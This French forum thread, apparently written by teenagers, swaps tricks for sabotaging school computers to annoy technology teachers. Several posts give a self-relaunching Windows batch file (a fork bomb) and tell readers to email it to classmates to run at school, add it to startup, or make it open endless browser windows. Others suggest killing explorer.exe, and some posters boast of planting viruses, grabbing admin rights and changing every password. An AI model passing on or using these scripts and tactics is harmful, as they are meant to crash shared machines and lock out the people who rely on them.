C'est la fin de l'année ? Envie d'énerver les profs de techno ? :)

• Auteur de la discussion Auteur de la discussion Sulfus
  • Créé le Créé le
Statut
N'est pas ouverte pour d'autres réponses.
Laisse mon code 10 minute sur tes ordis de collège ( qui sont probablement nul) et si ils vont pétés ou en tout cas surchauffé totalement.
C'est de la daube nos ordis au lycée. La marque c'est NEC, elle est dépassée depuis 47 ans et 7 mois cette marque, ça vaut plus rien. :fou:

C'est de la daube nos ordis au lycée. La marque c'est NEC, elle est dépassée depuis 47 ans et 7 mois cette marque, ça vaut plus rien. :fou:
Qu'est-ce que je disait :)

Sulfus , toujours envie de faire le con .

Si j'étais dans ta classe : :banzai:

Sulfus , toujours envie de faire le con .

Si j'étais dans ta classe : :banzai:
Dans ma classe c'est les profs qui nous respectent pas l'inverse :D

Ce truc est pas pour moi 0o j'ai rien pigé ^^

Dommage que je n'ai plus technologie, je l'aurais fait, ça à l'air drôle !

Hello :D

Alors voilà , c'est une petite astuce que m'a donner mon frère pour énerver un peu les profs de techno en fin d'année puisque je vais changer de collège disons qu'il faut bien que je m'amuse un peu et je pense que vous avez déja pensé à cette idée dans votre tête pour la fin de l'année

Mais le problème c'est que sur les PC les permissions d'admin sont désactivés et c'est un peu énervant si ont veut faire quelques conneries sur le PC avant de partir bronzer au soleil :)

Alors voilà quelques astuces très simple et très rapide à réaliser qui feront chauffer vos profs comme des fous

Pour ma part le mien à peter un cable et j'ai demandé à un ami prof de techno qui m'a dit qu'ils avaient passer la soirée à débugger les ordis :)

Alors c'est très simple , pour plus de discrétion et de rapidité faites ça d'abord chez vous et puis ensuite envoyez le sur l'email de tout vos amis qui le téléchargeront directement au collège et qui le lanceront!

Allez sur votre bloc notes écrivez un nouveau fichier avec écrit :

C'est de la merde ton truk le mieux tu ouvre le pad:
echo off
start *nom du fichier*
*nom du fichier*

et tu enregistre sous le nom que ta choisis tu fou sa sur le bureau par exemple, et prend note qu'il faut pas mettre les ptite étoile. pareil cest en .bat mais plus puissant.. Tu le lance y sarete jamais.
ENJOY ;)

trop lol faudrais que j'essaye:o))

Rien compris :hap:

C'est de la merde ton truk le mieux tu ouvre le pad:
echo off
start *nom du fichier*
*nom du fichier*

et tu enregistre sous le nom que ta choisis tu fou sa sur le bureau par exemple, et prend note qu'il faut pas mettre les ptite étoile. pareil cest en .bat mais plus puissant.. Tu le lance y sarete jamais.
ENJOY ;)
Sauf que si tu mes qu'un 'start' le programme que tu as cité se lancera qu'une fois. Il faut en mettre des centaines pour faire vraiment beuger l'ordi.

Sauf que si tu mes qu'un 'start' le programme que tu as cité se lancera qu'une fois. Il faut en mettre des centaines pour faire vraiment beuger l'ordi.

Créée le tu va voir on en reparle :)

Pourquoi personne n'aime les profs de techno xD

Pck leurs cours sont inutile ;)
Ba non attends, moi j'écoute de la musique, on est sur YT avec les ordis, on matte les meufs tranquillement etc

moi j'ai mit des virus dans les ordi pendant que le prof regardait pas^^

Ba non attends, moi j'écoute de la musique, on est sur YT avec les ordis, on matte les meufs tranquillement etc

PERVERSS ben dans n'importe quel cour c'est sa^^
moi j'ai mit des virus dans les ordi pendant que le prof regardait pas^^

Fait
echo off
start *nomdefichier*
*nomdeficher*

Puis save en .bat tu place sa dans les option de démarrage et ENJOY

C'est la base du codage :}
Faites le avec: iexplore.exe à la place de start. Ça ouvrira des fenêtres internet, ça lag plus ;)
Sinon sous Windows faites Ctrl+Alt+Sup, suprimmez le processus Explorer.exe. Plus que le fond d'ecran, assez drôle :)
Ça reste quand meme vraiment la base. Je ne suis plus sûr si c'est exactement explorer.exe, je suis sur mon iPod, je corrigerais au besoin.

C'est la base du codage :}
Faites le avec: iexplore.exe à la place de start. Ça ouvrira des fenêtres internet, ça lag plus ;)
Sinon sous Windows faites Ctrl+Alt+Sup, suprimmez le processus Explorer.exe. Plus que le fond d'ecran, assez drôle :)
Ça reste quand meme vraiment la base. Je ne suis plus sûr si c'est exactement explorer.exe, je suis sur mon iPod, je corrigerais au besoin.

Ouais je connais smarrant mais si tu l'éteind sa se remet le pross explorer^^ parcontre internet connaissait avec mozilla ^^

TRoP BieN !! Moi je me suis mis admin sur l'ordi et je fais ce que je veux ! J'ai changé tout les mots de passes ! Même si j'ai 8 de moyenne en techno j'adore cette matière juste pour les ordinateurs pourris et les pirater !!!

Statut
N'est pas ouverte pour d'autres réponses.
Retour